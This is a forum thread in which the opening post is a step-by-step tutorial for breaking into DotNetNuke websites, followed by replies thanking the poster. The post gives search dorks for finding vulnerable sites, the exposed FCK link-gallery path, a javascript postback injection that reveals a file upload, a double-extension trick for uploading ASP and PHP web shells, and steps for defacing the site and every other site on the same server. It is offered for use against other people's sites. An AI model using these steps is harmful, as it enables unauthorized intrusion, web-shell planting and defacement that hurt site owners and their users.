Hacking Tricks DNN ATTACK (DotNetNuke) attack+shell uploading[pics/Highly detailed]

Discussion in 'Ethical Hacking Tricks' started by #řǿȼƙ¥#, Jul 29, 2014.

  1. #řǿȼƙ¥#

    #řǿȼƙ¥# Active Member

    Joined:
    Jun 13, 2014
    Messages:
    48
    Likes Received:
    142
    Trophy Points:
    43


    Hello everyone!!
    I am going to tell about Dot net nuke exploit.I know some of you know about it but it is very good exploit to hack dot net sites.you can even hack all sites hosted on same server.You can upload any file using it.

    Is it easy??? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting.

    What is DNN ?

    DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

    Here is step by step tutorial:
    Upload random file

    Code:
    *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png,
    *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.3gp,
    *.asf, *.asx, *.avi, *.flv, *.m4v, *.mov, *.mp4, *.mpe, *.mpeg, *.mpg,
    *.ram, *.rm, *.rmvb, *.wm, *.wmv, *.vob
    by defualt but admin may change this and you will have a Shell directly
    step 1:use this dork to find vulnerable site

    Code:
    inurl:home/tabid/36/language/en-US/Default.aspx
    another dorks you can use
    Code:
    inurl:fcklinkgallery.aspx
    inurl:/portals/0

    step 2:now open any site like
    Code:
    http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx
    replace "home/tabid/36/language/en-US/Default.aspx" with Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

    so your url will become
    Code:
    http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
    then hit enter

    and if you are lucky you will get this Spoiler
    [​IMG]
    step 3:Select 3rd option[file] Spoiler
    [​IMG]
    step 4: inject the following java code in browser address bar

    Code:
    javascript:__doPostBack('ctlURL$cmdUpload','')
    you will get this upload option. Spoiler
    [​IMG]
    step 5:Navigate to

    Code:
    http://www.vulsite.com/portals/0/z.txt
    Spoiler

    You can see our file successfully uploaded.

    method to upload shell:

    Things you need:
    An
    ASP shell
    r57 or C99 Shell or anyother shell

    step 4:rename your asp shell to
    Code:
    yourshell.asp;.jpg
    and upload it.

    step 5:Navigate it through
    Code:
    http://www.vulsite.com/portals/0/yourshell.asp;.jpg
    Spoiler

    step 6:Now upload your php shell using upload file option marked in above image.

    step 7:Navigate it through
    Code:
    http://www.vulsite.com/portals/0/yourphpshell.php
    Voila you have your shell.

    Deface
    step 8:Now replace your index.html with original index.html.Thats it.

    all sites in server
    Well you can hack all sites hosted on same server.

    Hacking is Not A Crime . Its a Art . ;)




     


    RELATED POSTS




  2. nice one you are a real hacker
     

  3. booblemush

    booblemush Guest



    nice one bro
     

  4. Rahul1995

    Rahul1995 Member

    Joined:
    Sep 30, 2014
    Messages:
    45
    Likes Received:
    1
    Trophy Points:
    18


    Thanks for the hack.
    Really nice contribution.
     

  5. shadid

    shadid Member

    Joined:
    Oct 27, 2014
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    16


    thaaaaaaaaaaaaaanx
     

  6. devilwars

    devilwars Member

    Joined:
    Oct 15, 2014
    Messages:
    42
    Likes Received:
    0
    Trophy Points:
    18


    goooooddddd one bro
     

  7. john doe

    john doe New Member

    Joined:
    Nov 1, 2014
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1


    thanks for this :)
     

  8. john doe

    john doe New Member

    Joined:
    Nov 1, 2014
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1


    thanks for this :)
     

  9. prakhar

    prakhar Member

    Joined:
    Oct 20, 2014
    Messages:
    62
    Likes Received:
    4
    Trophy Points:
    18


    thank you so much
     

  10. zeezooo777

    zeezooo777 Member

    Joined:
    Nov 2, 2014
    Messages:
    66
    Likes Received:
    0
    Trophy Points:
    18


    thanx man ....
     

  11. Acid Port

    Acid Port Trusted Member Trusted Member

    Joined:
    Oct 25, 2014
    Messages:
    100
    Likes Received:
    205
    Trophy Points:
    93


    let check this out
     

  12. ravirajpoot

    ravirajpoot New Member

    Joined:
    Feb 15, 2015
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    3


    Thnaks lets chk this
     

Similar Threads: ATTACK (DotNetNuke)
Forum Title Date
Ethical Hacking Tricks Zed Attack Proxy - Web Application Penetration Testing Tool Jan 23, 2017
Ethical Hacking Tricks Aircrack-ng - WiFi Network Security Suite (Monitoring, Attacking, Testing, and Cracking) Jan 20, 2017
Ethical Hacking Tricks Cyber Operations - Building, Defending, and Attacking Modern Computer Networks Jun 24, 2016
Ethical Hacking Tricks Web Hacking - Attacks and Defense May 12, 2016
Ethical Hacking Tricks Network Attacks and Exploitation: A Framework by Matthew Monte Mar 11, 2016

Share This Page